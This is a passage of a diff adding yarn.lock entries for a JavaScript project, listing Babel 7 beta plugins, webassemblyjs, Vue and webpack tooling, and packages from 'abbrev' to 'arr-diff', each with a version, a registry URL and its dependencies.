"https://registry.yarnpkg.com/@babel/plugin-transform-destructuring/-/plugin-transform-destructuring-7.0.0-beta.47.tgz#452b607775fd1c4d10621997837189efc0a6d428" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + 
+"@babel/plugin-transform-dotall-regex@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-dotall-regex/-/plugin-transform-dotall-regex-7.0.0-beta.47.tgz#d8da9b706d4bfc68dec9d565661f83e6e8036636" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + "@babel/helper-regex" "7.0.0-beta.47" + regexpu-core "^4.1.3" + +"@babel/plugin-transform-duplicate-keys@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-duplicate-keys/-/plugin-transform-duplicate-keys-7.0.0-beta.47.tgz#4aabeda051ca3007e33a207db08f1a0cf9bd253b" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-transform-exponentiation-operator@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-exponentiation-operator/-/plugin-transform-exponentiation-operator-7.0.0-beta.47.tgz#930e1abf5db9f4db5b63dbf97f3581ad0be1e907" + dependencies: + "@babel/helper-builder-binary-assignment-operator-visitor" "7.0.0-beta.47" + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-transform-for-of@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-for-of/-/plugin-transform-for-of-7.0.0-beta.47.tgz#527d5dc24e4a4ad0fc1d0a3990d29968cb984e76" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-transform-function-name@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-function-name/-/plugin-transform-function-name-7.0.0-beta.47.tgz#fb443c81cc77f3206a863b730b35c8c553ce5041" + dependencies: + "@babel/helper-function-name" "7.0.0-beta.47" + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-transform-literals@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved 
"https://registry.yarnpkg.com/@babel/plugin-transform-literals/-/plugin-transform-literals-7.0.0-beta.47.tgz#448fad196f062163684a38f10f14e83315892e9c" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-transform-modules-amd@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-modules-amd/-/plugin-transform-modules-amd-7.0.0-beta.47.tgz#84564419b11c1be6b9fcd4c7b3a6737f2335aac4" + dependencies: + "@babel/helper-module-transforms" "7.0.0-beta.47" + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-transform-modules-commonjs@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-modules-commonjs/-/plugin-transform-modules-commonjs-7.0.0-beta.47.tgz#dfe5c6d867aa9614e55f7616736073edb3aab887" + dependencies: + "@babel/helper-module-transforms" "7.0.0-beta.47" + "@babel/helper-plugin-utils" "7.0.0-beta.47" + "@babel/helper-simple-access" "7.0.0-beta.47" + +"@babel/plugin-transform-modules-systemjs@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-modules-systemjs/-/plugin-transform-modules-systemjs-7.0.0-beta.47.tgz#8514dbcdfca3345abd690059e7e8544e16ecbf05" + dependencies: + "@babel/helper-hoist-variables" "7.0.0-beta.47" + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-transform-modules-umd@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-modules-umd/-/plugin-transform-modules-umd-7.0.0-beta.47.tgz#6dcfb9661fdd131b20b721044746a7a309882918" + dependencies: + "@babel/helper-module-transforms" "7.0.0-beta.47" + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-transform-new-target@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-new-target/-/plugin-transform-new-target-7.0.0-beta.47.tgz#4b5cb7ce30d7bffa105a1f43ed07d6ae206a4155" + 
dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-transform-object-super@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-object-super/-/plugin-transform-object-super-7.0.0-beta.47.tgz#ca8e5f326c5011c879f3a6ed749e58bd10fff05d" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + "@babel/helper-replace-supers" "7.0.0-beta.47" + +"@babel/plugin-transform-parameters@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-parameters/-/plugin-transform-parameters-7.0.0-beta.47.tgz#46a4236040a6552a5f165fb3ddd60368954b0ddd" + dependencies: + "@babel/helper-call-delegate" "7.0.0-beta.47" + "@babel/helper-get-function-arity" "7.0.0-beta.47" + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-transform-regenerator@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-regenerator/-/plugin-transform-regenerator-7.0.0-beta.47.tgz#86500e1c404055fb98fc82b73b09bd053cacb516" + dependencies: + regenerator-transform "^0.12.3" + +"@babel/plugin-transform-runtime@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-runtime/-/plugin-transform-runtime-7.0.0-beta.47.tgz#1700938fa8710909cbf28f7dd39f9b40688b09fd" + dependencies: + "@babel/helper-module-imports" "7.0.0-beta.47" + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-transform-shorthand-properties@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-shorthand-properties/-/plugin-transform-shorthand-properties-7.0.0-beta.47.tgz#00be44c4fad8fe2c00ed18ea15ea3c88dd519dbb" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-transform-spread@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved 
"https://registry.yarnpkg.com/@babel/plugin-transform-spread/-/plugin-transform-spread-7.0.0-beta.47.tgz#3feadb02292ed1e9b75090d651b9df88a7ab5c50" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-transform-sticky-regex@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-sticky-regex/-/plugin-transform-sticky-regex-7.0.0-beta.47.tgz#c0aa347d76b5dc87d3b37ac016ada3f950605131" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + "@babel/helper-regex" "7.0.0-beta.47" + +"@babel/plugin-transform-template-literals@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-template-literals/-/plugin-transform-template-literals-7.0.0-beta.47.tgz#5f7b5badf64c4c5da79026aeab03001e62a6ee5f" + dependencies: + "@babel/helper-annotate-as-pure" "7.0.0-beta.47" + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-transform-typeof-symbol@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-typeof-symbol/-/plugin-transform-typeof-symbol-7.0.0-beta.47.tgz#03c612ec09213eb386a81d5fa67c234ee4b2034c" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-transform-unicode-regex@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-unicode-regex/-/plugin-transform-unicode-regex-7.0.0-beta.47.tgz#efed0b2f1dfbf28283502234a95b4be88f7fdcb6" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + "@babel/helper-regex" "7.0.0-beta.47" + regexpu-core "^4.1.3" + +"@babel/preset-env@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/preset-env/-/preset-env-7.0.0-beta.47.tgz#a3dab3b5fac4de56e3510bdbcb528f1cbdedbe2d" + dependencies: + "@babel/helper-module-imports" "7.0.0-beta.47" + "@babel/helper-plugin-utils" "7.0.0-beta.47" + 
"@babel/plugin-proposal-async-generator-functions" "7.0.0-beta.47" + "@babel/plugin-proposal-object-rest-spread" "7.0.0-beta.47" + "@babel/plugin-proposal-optional-catch-binding" "7.0.0-beta.47" + "@babel/plugin-proposal-unicode-property-regex" "7.0.0-beta.47" + "@babel/plugin-syntax-async-generators" "7.0.0-beta.47" + "@babel/plugin-syntax-object-rest-spread" "7.0.0-beta.47" + "@babel/plugin-syntax-optional-catch-binding" "7.0.0-beta.47" + "@babel/plugin-transform-arrow-functions" "7.0.0-beta.47" + "@babel/plugin-transform-async-to-generator" "7.0.0-beta.47" + "@babel/plugin-transform-block-scoped-functions" "7.0.0-beta.47" + "@babel/plugin-transform-block-scoping" "7.0.0-beta.47" + "@babel/plugin-transform-classes" "7.0.0-beta.47" + "@babel/plugin-transform-computed-properties" "7.0.0-beta.47" + "@babel/plugin-transform-destructuring" "7.0.0-beta.47" + "@babel/plugin-transform-dotall-regex" "7.0.0-beta.47" + "@babel/plugin-transform-duplicate-keys" "7.0.0-beta.47" + "@babel/plugin-transform-exponentiation-operator" "7.0.0-beta.47" + "@babel/plugin-transform-for-of" "7.0.0-beta.47" + "@babel/plugin-transform-function-name" "7.0.0-beta.47" + "@babel/plugin-transform-literals" "7.0.0-beta.47" + "@babel/plugin-transform-modules-amd" "7.0.0-beta.47" + "@babel/plugin-transform-modules-commonjs" "7.0.0-beta.47" + "@babel/plugin-transform-modules-systemjs" "7.0.0-beta.47" + "@babel/plugin-transform-modules-umd" "7.0.0-beta.47" + "@babel/plugin-transform-new-target" "7.0.0-beta.47" + "@babel/plugin-transform-object-super" "7.0.0-beta.47" + "@babel/plugin-transform-parameters" "7.0.0-beta.47" + "@babel/plugin-transform-regenerator" "7.0.0-beta.47" + "@babel/plugin-transform-shorthand-properties" "7.0.0-beta.47" + "@babel/plugin-transform-spread" "7.0.0-beta.47" + "@babel/plugin-transform-sticky-regex" "7.0.0-beta.47" + "@babel/plugin-transform-template-literals" "7.0.0-beta.47" + "@babel/plugin-transform-typeof-symbol" "7.0.0-beta.47" + 
"@babel/plugin-transform-unicode-regex" "7.0.0-beta.47" + browserslist "^3.0.0" + invariant "^2.2.2" + semver "^5.3.0" + +"@babel/preset-stage-2@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/preset-stage-2/-/preset-stage-2-7.0.0-beta.47.tgz#deb930c44d7d6e519a33174bba121a2a630ed654" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + "@babel/plugin-proposal-decorators" "7.0.0-beta.47" + "@babel/plugin-proposal-export-namespace-from" "7.0.0-beta.47" + "@babel/plugin-proposal-function-sent" "7.0.0-beta.47" + "@babel/plugin-proposal-numeric-separator" "7.0.0-beta.47" + "@babel/plugin-proposal-throw-expressions" "7.0.0-beta.47" + "@babel/preset-stage-3" "7.0.0-beta.47" + +"@babel/preset-stage-3@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/preset-stage-3/-/preset-stage-3-7.0.0-beta.47.tgz#17028f3b5dddc548d80404c86ed62622f601597b" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + "@babel/plugin-proposal-async-generator-functions" "7.0.0-beta.47" + "@babel/plugin-proposal-class-properties" "7.0.0-beta.47" + "@babel/plugin-proposal-object-rest-spread" "7.0.0-beta.47" + "@babel/plugin-proposal-optional-catch-binding" "7.0.0-beta.47" + "@babel/plugin-proposal-unicode-property-regex" "7.0.0-beta.47" + "@babel/plugin-syntax-dynamic-import" "7.0.0-beta.47" + "@babel/plugin-syntax-import-meta" "7.0.0-beta.47" + +"@babel/runtime@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/runtime/-/runtime-7.0.0-beta.47.tgz#273f5e71629e80f6cbcd7507503848615e59f7e0" + dependencies: + core-js "^2.5.3" + regenerator-runtime "^0.11.1" + +"@babel/template@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/template/-/template-7.0.0-beta.47.tgz#0473970a7c0bee7a1a18c1ca999d3ba5e5bad83d" + dependencies: + "@babel/code-frame" "7.0.0-beta.47" + "@babel/types" "7.0.0-beta.47" + babylon "7.0.0-beta.47" + lodash 
"^4.17.5" + +"@babel/traverse@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/traverse/-/traverse-7.0.0-beta.47.tgz#0e57fdbb9ff3a909188b6ebf1e529c641e6c82a4" + dependencies: + "@babel/code-frame" "7.0.0-beta.47" + "@babel/generator" "7.0.0-beta.47" + "@babel/helper-function-name" "7.0.0-beta.47" + "@babel/helper-split-export-declaration" "7.0.0-beta.47" + "@babel/types" "7.0.0-beta.47" + babylon "7.0.0-beta.47" + debug "^3.1.0" + globals "^11.1.0" + invariant "^2.2.0" + lodash "^4.17.5" + +"@babel/types@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/types/-/types-7.0.0-beta.47.tgz#e6fcc1a691459002c2671d558a586706dddaeef8" + dependencies: + esutils "^2.0.2" + lodash "^4.17.5" + to-fast-properties "^2.0.0" + +"@mrmlnc/readdir-enhanced@^2.2.1": + version "2.2.1" + resolved "https://registry.yarnpkg.com/@mrmlnc/readdir-enhanced/-/readdir-enhanced-2.2.1.tgz#524af240d1a360527b730475ecfa1344aa540dde" + dependencies: + call-me-maybe "^1.0.1" + glob-to-regexp "^0.3.0" + +"@nodelib/fs.stat@^1.0.1": + version "1.1.0" + resolved "https://registry.yarnpkg.com/@nodelib/fs.stat/-/fs.stat-1.1.0.tgz#50c1e2260ac0ed9439a181de3725a0168d59c48a" + +"@shellscape/koa-send@^4.1.0": + version "4.1.3" + resolved "https://registry.yarnpkg.com/@shellscape/koa-send/-/koa-send-4.1.3.tgz#1a7c8df21f63487e060b7bfd8ed82e1d3c4ae0b0" + dependencies: + debug "^2.6.3" + http-errors "^1.6.1" + mz "^2.6.0" + resolve-path "^1.3.3" + +"@shellscape/koa-static@^4.0.4": + version "4.0.5" + resolved "https://registry.yarnpkg.com/@shellscape/koa-static/-/koa-static-4.0.5.tgz#b329b55bfd41056a6981c584ae6bace30b5b6b3b" + dependencies: + "@shellscape/koa-send" "^4.1.0" + debug "^2.6.8" + +"@vue/babel-preset-app@3.0.0-beta.11": + version "3.0.0-beta.11" + resolved "https://registry.yarnpkg.com/@vue/babel-preset-app/-/babel-preset-app-3.0.0-beta.11.tgz#c8b889aa73464050f9cd3f9dc621951d85c24508" + dependencies: + 
"@babel/plugin-syntax-jsx" "7.0.0-beta.47" + "@babel/plugin-transform-runtime" "7.0.0-beta.47" + "@babel/preset-env" "7.0.0-beta.47" + "@babel/preset-stage-2" "7.0.0-beta.47" + "@babel/runtime" "7.0.0-beta.47" + babel-helper-vue-jsx-merge-props "^2.0.3" + babel-plugin-dynamic-import-node "^1.2.0" + babel-plugin-transform-vue-jsx "^4.0.1" + +"@vue/component-compiler-utils@^1.2.1": + version "1.3.1" + resolved "https://registry.yarnpkg.com/@vue/component-compiler-utils/-/component-compiler-utils-1.3.1.tgz#686f0b913d59590ae327b2a1cb4b6d9b931bbe0e" + dependencies: + consolidate "^0.15.1" + hash-sum "^1.0.2" + lru-cache "^4.1.2" + merge-source-map "^1.1.0" + postcss "^6.0.20" + postcss-selector-parser "^3.1.1" + prettier "^1.13.0" + source-map "^0.5.6" + vue-template-es2015-compiler "^1.6.0" + +"@webassemblyjs/ast@1.5.12": + version "1.5.12" + resolved "https://registry.yarnpkg.com/@webassemblyjs/ast/-/ast-1.5.12.tgz#a9acbcb3f25333c4edfa1fdf3186b1ccf64e6664" + dependencies: + "@webassemblyjs/helper-module-context" "1.5.12" + "@webassemblyjs/helper-wasm-bytecode" "1.5.12" + "@webassemblyjs/wast-parser" "1.5.12" + debug "^3.1.0" + mamacro "^0.0.3" + +"@webassemblyjs/floating-point-hex-parser@1.5.12": + version "1.5.12" + resolved "https://registry.yarnpkg.com/@webassemblyjs/floating-point-hex-parser/-/floating-point-hex-parser-1.5.12.tgz#0f36044ffe9652468ce7ae5a08716a4eeff9cd9c" + +"@webassemblyjs/helper-api-error@1.5.12": + version "1.5.12" + resolved "https://registry.yarnpkg.com/@webassemblyjs/helper-api-error/-/helper-api-error-1.5.12.tgz#05466833ff2f9d8953a1a327746e1d112ea62aaf" + +"@webassemblyjs/helper-buffer@1.5.12": + version "1.5.12" + resolved "https://registry.yarnpkg.com/@webassemblyjs/helper-buffer/-/helper-buffer-1.5.12.tgz#1f0de5aaabefef89aec314f7f970009cd159c73d" + dependencies: + debug "^3.1.0" + +"@webassemblyjs/helper-code-frame@1.5.12": + version "1.5.12" + resolved 
"https://registry.yarnpkg.com/@webassemblyjs/helper-code-frame/-/helper-code-frame-1.5.12.tgz#3cdc1953093760d1c0f0caf745ccd62bdb6627c7" + dependencies: + "@webassemblyjs/wast-printer" "1.5.12" + +"@webassemblyjs/helper-fsm@1.5.12": + version "1.5.12" + resolved "https://registry.yarnpkg.com/@webassemblyjs/helper-fsm/-/helper-fsm-1.5.12.tgz#6bc1442b037f8e30f2e57b987cee5c806dd15027" + +"@webassemblyjs/helper-module-context@1.5.12": + version "1.5.12" + resolved "https://registry.yarnpkg.com/@webassemblyjs/helper-module-context/-/helper-module-context-1.5.12.tgz#b5588ca78b33b8a0da75f9ab8c769a3707baa861" + dependencies: + debug "^3.1.0" + mamacro "^0.0.3" + +"@webassemblyjs/helper-wasm-bytecode@1.5.12": + version "1.5.12" + resolved "https://registry.yarnpkg.com/@webassemblyjs/helper-wasm-bytecode/-/helper-wasm-bytecode-1.5.12.tgz#d12a3859db882a448891a866a05d0be63785b616" + +"@webassemblyjs/helper-wasm-section@1.5.12": + version "1.5.12" + resolved "https://registry.yarnpkg.com/@webassemblyjs/helper-wasm-section/-/helper-wasm-section-1.5.12.tgz#ff9fe1507d368ad437e7969d25e8c1693dac1884" + dependencies: + "@webassemblyjs/ast" "1.5.12" + "@webassemblyjs/helper-buffer" "1.5.12" + "@webassemblyjs/helper-wasm-bytecode" "1.5.12" + "@webassemblyjs/wasm-gen" "1.5.12" + debug "^3.1.0" + +"@webassemblyjs/ieee754@1.5.12": + version "1.5.12" + resolved "https://registry.yarnpkg.com/@webassemblyjs/ieee754/-/ieee754-1.5.12.tgz#ee9574bc558888f13097ce3e7900dff234ea19a4" + dependencies: + ieee754 "^1.1.11" + +"@webassemblyjs/leb128@1.5.12": + version "1.5.12" + resolved "https://registry.yarnpkg.com/@webassemblyjs/leb128/-/leb128-1.5.12.tgz#0308eec652765ee567d8a5fa108b4f0b25b458e1" + dependencies: + leb "^0.3.0" + +"@webassemblyjs/utf8@1.5.12": + version "1.5.12" + resolved "https://registry.yarnpkg.com/@webassemblyjs/utf8/-/utf8-1.5.12.tgz#d5916222ef314bf60d6806ed5ac045989bfd92ce" + +"@webassemblyjs/wasm-edit@1.5.12": + version "1.5.12" + resolved 
"https://registry.yarnpkg.com/@webassemblyjs/wasm-edit/-/wasm-edit-1.5.12.tgz#821c9358e644a166f2c910e5af1b46ce795a17aa" + dependencies: + "@webassemblyjs/ast" "1.5.12" + "@webassemblyjs/helper-buffer" "1.5.12" + "@webassemblyjs/helper-wasm-bytecode" "1.5.12" + "@webassemblyjs/helper-wasm-section" "1.5.12" + "@webassemblyjs/wasm-gen" "1.5.12" + "@webassemblyjs/wasm-opt" "1.5.12" + "@webassemblyjs/wasm-parser" "1.5.12" + "@webassemblyjs/wast-printer" "1.5.12" + debug "^3.1.0" + +"@webassemblyjs/wasm-gen@1.5.12": + version "1.5.12" + resolved "https://registry.yarnpkg.com/@webassemblyjs/wasm-gen/-/wasm-gen-1.5.12.tgz#0b7ccfdb93dab902cc0251014e2e18bae3139bcb" + dependencies: + "@webassemblyjs/ast" "1.5.12" + "@webassemblyjs/helper-wasm-bytecode" "1.5.12" + "@webassemblyjs/ieee754" "1.5.12" + "@webassemblyjs/leb128" "1.5.12" + "@webassemblyjs/utf8" "1.5.12" + +"@webassemblyjs/wasm-opt@1.5.12": + version "1.5.12" + resolved "https://registry.yarnpkg.com/@webassemblyjs/wasm-opt/-/wasm-opt-1.5.12.tgz#bd758a8bc670f585ff1ae85f84095a9e0229cbc9" + dependencies: + "@webassemblyjs/ast" "1.5.12" + "@webassemblyjs/helper-buffer" "1.5.12" + "@webassemblyjs/wasm-gen" "1.5.12" + "@webassemblyjs/wasm-parser" "1.5.12" + debug "^3.1.0" + +"@webassemblyjs/wasm-parser@1.5.12": + version "1.5.12" + resolved "https://registry.yarnpkg.com/@webassemblyjs/wasm-parser/-/wasm-parser-1.5.12.tgz#7b10b4388ecf98bd7a22e702aa62ec2f46d0c75e" + dependencies: + "@webassemblyjs/ast" "1.5.12" + "@webassemblyjs/helper-api-error" "1.5.12" + "@webassemblyjs/helper-wasm-bytecode" "1.5.12" + "@webassemblyjs/ieee754" "1.5.12" + "@webassemblyjs/leb128" "1.5.12" + "@webassemblyjs/utf8" "1.5.12" + +"@webassemblyjs/wast-parser@1.5.12": + version "1.5.12" + resolved "https://registry.yarnpkg.com/@webassemblyjs/wast-parser/-/wast-parser-1.5.12.tgz#9cf5ae600ecae0640437b5d4de5dd6b6088d0d8b" + dependencies: + "@webassemblyjs/ast" "1.5.12" + "@webassemblyjs/floating-point-hex-parser" "1.5.12" + 
"@webassemblyjs/helper-api-error" "1.5.12" + "@webassemblyjs/helper-code-frame" "1.5.12" + "@webassemblyjs/helper-fsm" "1.5.12" + long "^3.2.0" + mamacro "^0.0.3" + +"@webassemblyjs/wast-printer@1.5.12": + version "1.5.12" + resolved "https://registry.yarnpkg.com/@webassemblyjs/wast-printer/-/wast-printer-1.5.12.tgz#563ca4d01b22d21640b2463dc5e3d7f7d9dac520" + dependencies: + "@webassemblyjs/ast" "1.5.12" + "@webassemblyjs/wast-parser" "1.5.12" + long "^3.2.0" + +"@webpack-contrib/config-loader@^1.1.1": + version "1.1.3" + resolved "https://registry.yarnpkg.com/@webpack-contrib/config-loader/-/config-loader-1.1.3.tgz#6cce904cabfd880203db600207fdbf64f4744fd7" + dependencies: + "@webpack-contrib/schema-utils" "^1.0.0-beta.0" + chalk "^2.1.0" + cosmiconfig "^5.0.2" + loud-rejection "^1.6.0" + merge-options "^1.0.1" + minimist "^1.2.0" + resolve "^1.6.0" + webpack-log "^1.1.2" + +"@webpack-contrib/schema-utils@^1.0.0-beta.0": + version "1.0.0-beta.0" + resolved "https://registry.yarnpkg.com/@webpack-contrib/schema-utils/-/schema-utils-1.0.0-beta.0.tgz#bf9638c9464d177b48209e84209e23bee2eb4f65" + dependencies: + ajv "^6.1.0" + ajv-keywords "^3.1.0" + chalk "^2.3.2" + strip-ansi "^4.0.0" + text-table "^0.2.0" + webpack-log "^1.1.2" + +abbrev@1: + version "1.1.1" + resolved "https://registry.yarnpkg.com/abbrev/-/abbrev-1.1.1.tgz#f8f2c887ad10bf67f634f005b6987fed3179aac8" + +accepts@^1.2.2: + version "1.3.5" + resolved "https://registry.yarnpkg.com/accepts/-/accepts-1.3.5.tgz#eb777df6011723a3b14e8a72c0805c8e86746bd2" + dependencies: + mime-types "~2.1.18" + negotiator "0.6.1" + +acorn-dynamic-import@^3.0.0: + version "3.0.0" + resolved "https://registry.yarnpkg.com/acorn-dynamic-import/-/acorn-dynamic-import-3.0.0.tgz#901ceee4c7faaef7e07ad2a47e890675da50a278" + dependencies: + acorn "^5.0.0" + +acorn@^5.0.0, acorn@^5.6.2: + version "5.7.1" + resolved "https://registry.yarnpkg.com/acorn/-/acorn-5.7.1.tgz#f095829297706a7c9776958c0afc8930a9b9d9d8" + +agentkeepalive@^2.2.0: + 
version "2.2.0" + resolved "https://registry.yarnpkg.com/agentkeepalive/-/agentkeepalive-2.2.0.tgz#c5d1bd4b129008f1163f236f86e5faea2026e2ef" + +ajv-keywords@^3.0.0, ajv-keywords@^3.1.0: + version "3.2.0" + resolved "https://registry.yarnpkg.com/ajv-keywords/-/ajv-keywords-3.2.0.tgz#e86b819c602cf8821ad637413698f1dec021847a" + +ajv@^6.0.1, ajv@^6.1.0: + version "6.5.1" + resolved "https://registry.yarnpkg.com/ajv/-/ajv-6.5.1.tgz#88ebc1263c7133937d108b80c5572e64e1d9322d" + dependencies: + fast-deep-equal "^2.0.1" + fast-json-stable-stringify "^2.0.0" + json-schema-traverse "^0.4.1" + uri-js "^4.2.1" + +algoliasearch@^3.24.5: + version "3.29.0" + resolved "https://registry.yarnpkg.com/algoliasearch/-/algoliasearch-3.29.0.tgz#d04021a5450be55ce314b928bba4a38723399bd8" + dependencies: + agentkeepalive "^2.2.0" + debug "^2.6.8" + envify "^4.0.0" + es6-promise "^4.1.0" + events "^1.1.0" + foreach "^2.0.5" + global "^4.3.2" + inherits "^2.0.1" + isarray "^2.0.1" + load-script "^1.0.0" + object-keys "^1.0.11" + querystring-es3 "^0.2.1" + reduce "^1.0.1" + semver "^5.1.0" + tunnel-agent "^0.6.0" + +alphanum-sort@^1.0.1, alphanum-sort@^1.0.2: + version "1.0.2" + resolved "https://registry.yarnpkg.com/alphanum-sort/-/alphanum-sort-1.0.2.tgz#97a1119649b211ad33691d9f9f486a8ec9fbe0a3" + +amdefine@>=0.0.4: + version "1.0.1" + resolved "https://registry.yarnpkg.com/amdefine/-/amdefine-1.0.1.tgz#4a5282ac164729e93619bcfd3ad151f817ce91f5" + +ansi-align@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/ansi-align/-/ansi-align-2.0.0.tgz#c36aeccba563b89ceb556f3690f0b1d9e3547f7f" + dependencies: + string-width "^2.0.0" + +ansi-escapes@^3.0.0: + version "3.1.0" + resolved "https://registry.yarnpkg.com/ansi-escapes/-/ansi-escapes-3.1.0.tgz#f73207bb81207d75fd6c83f125af26eea378ca30" + +ansi-regex@^2.0.0: + version "2.1.1" + resolved "https://registry.yarnpkg.com/ansi-regex/-/ansi-regex-2.1.1.tgz#c3b33ab5ee360d86e0e628f0468ae7ef27d654df" + +ansi-regex@^3.0.0: + version "3.0.0" + 
resolved "https://registry.yarnpkg.com/ansi-regex/-/ansi-regex-3.0.0.tgz#ed0317c322064f79466c02966bddb605ab37d998" + +ansi-styles@^2.2.1: + version "2.2.1" + resolved "https://registry.yarnpkg.com/ansi-styles/-/ansi-styles-2.2.1.tgz#b432dd3358b634cf75e1e4664368240533c1ddbe" + +ansi-styles@^3.2.1: + version "3.2.1" + resolved "https://registry.yarnpkg.com/ansi-styles/-/ansi-styles-3.2.1.tgz#41fbb20243e50b12be0f04b8dedbf07520ce841d" + dependencies: + color-convert "^1.9.0" + +any-promise@^1.0.0, any-promise@^1.1.0: + version "1.3.0" + resolved "https://registry.yarnpkg.com/any-promise/-/any-promise-1.3.0.tgz#abc6afeedcea52e809cdc0376aed3ce39635d17f" + +anymatch@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/anymatch/-/anymatch-2.0.0.tgz#bcb24b4f37934d9aa7ac17b4adaf89e7c76ef2eb" + dependencies: + micromatch "^3.1.4" + normalize-path "^2.1.1" + +app-root-path@^2.0.1: + version "2.0.1" + resolved "https://registry.yarnpkg.com/app-root-path/-/app-root-path-2.0.1.tgz#cd62dcf8e4fd5a417efc664d2e5b10653c651b46" + +aproba@^1.0.3, aproba@^1.1.1: + version "1.2.0" + resolved "https://registry.yarnpkg.com/aproba/-/aproba-1.2.0.tgz#6802e6264efd18c790a1b0d517f0f2627bf2c94a" + +arch@^2.1.0: + version "2.1.1" + resolved "https://registry.yarnpkg.com/arch/-/arch-2.1.1.tgz#8f5c2731aa35a30929221bb0640eed65175ec84e" + +are-we-there-yet@~1.1.2: + version "1.1.5" + resolved "https://registry.yarnpkg.com/are-we-there-yet/-/are-we-there-yet-1.1.5.tgz#4b35c2944f062a8bfcda66410760350fe9ddfc21" + dependencies: + delegates "^1.0.0" + readable-stream "^2.0.6" + +argparse@^1.0.7: + version "1.0.10" + resolved "https://registry.yarnpkg.com/argparse/-/argparse-1.0.10.tgz#bcd6791ea5ae09725e17e5ad988134cd40b3d911" + dependencies: + sprintf-js "~1.0.2" + +arr-diff@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/arr-diff/-/arr-diff-2.0.0.tgz#8f3b827f955a8bd669697e4a4256ac3ceae356cf" + dependencies: + arr-flatten "^1.0.1" + +arr-diff@^4.0.0: + version "4.0.0" + 
